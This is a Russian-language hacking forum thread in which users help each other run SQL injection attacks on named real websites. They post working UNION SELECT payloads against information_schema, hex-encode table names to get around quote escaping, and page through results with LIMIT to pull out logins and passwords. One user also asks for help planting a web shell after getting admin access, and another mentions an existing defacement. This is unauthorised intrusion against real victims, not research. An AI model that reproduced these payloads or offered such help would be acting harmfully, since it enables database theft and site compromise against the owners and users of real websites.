09.01.2012, 15:35
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Очень часто сталкиваюсь вот с такой проблемой, при запросе вида.php?id=-1+union+select+1,2,group_concat(column_name)+from+ information_schema.columns+where+table_name='Shop_ user'+--+
Пишет ошибку:
ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'Shop_user\' --' at line 1
Тоесть ругается на кавычки чтоль? Пробывал 'Shop_user' шифровать. При шифровке выводится стиль страницы с пустым содержимым. Тоесть на месте принтабельного поля ничего нету. Помогите пожалуйсто.
|
|
|
09.01.2012, 15:38
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от pirat0
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,
Попробуй подставить в параметр act имя несуществуещего файла или подставь кавычку, слеши, вообщем вызови таким образом ошибку. После этого увидишь путь Failed to open stream.. бла бла... /home/path/htdos/files/nesuch_file.php
Если не поможет, то попробуй угадать названия папок, может листинг есть.
2York,
у тебя mq=on, поэтому загони имя таблицы в hex. Тогда синтаксис будет таков:
Код:
table_name=0x53686f705f2075736572--+a
|
|
|
|
09.01.2012, 15:51
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Не.. никак.. вот ссыль
http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+
|
|
|
|
09.01.2012, 15:55
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от York
Не.. никак.. вот ссыль
http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+
http://neoklimat.ru/pages.php?id=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x53686F705F75736572 +limit+0,20+--+
вот так катит просто перебором делай, через limit
|
|
|
|
09.01.2012, 15:58
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Ereee, нету там (в моем вопросе) листинга директорий, подставлял неверный запрос просто пустая страница(
|
|
|
|
09.01.2012, 15:58
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Спасибо
|
|
|
|
09.01.2012, 15:58
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
2pirat0,
скинь URL в ЛС.
2York,
Все выводится:
http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6F705F75736572--
|
|
|
|
09.01.2012, 16:00
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.
|
|
|
|
09.01.2012, 16:02
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от York
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.
Во-первых синтаксис не верный. Во-вторых в конце запроса имя таблицы нельзя в хекс переводить(да и нафиг нужен).
P.S. Дам твой дефейс стоит, нафиг тебе скулья?
|
|
|
|
09.01.2012, 16:02
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Если без хекса то
Ой, не то
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
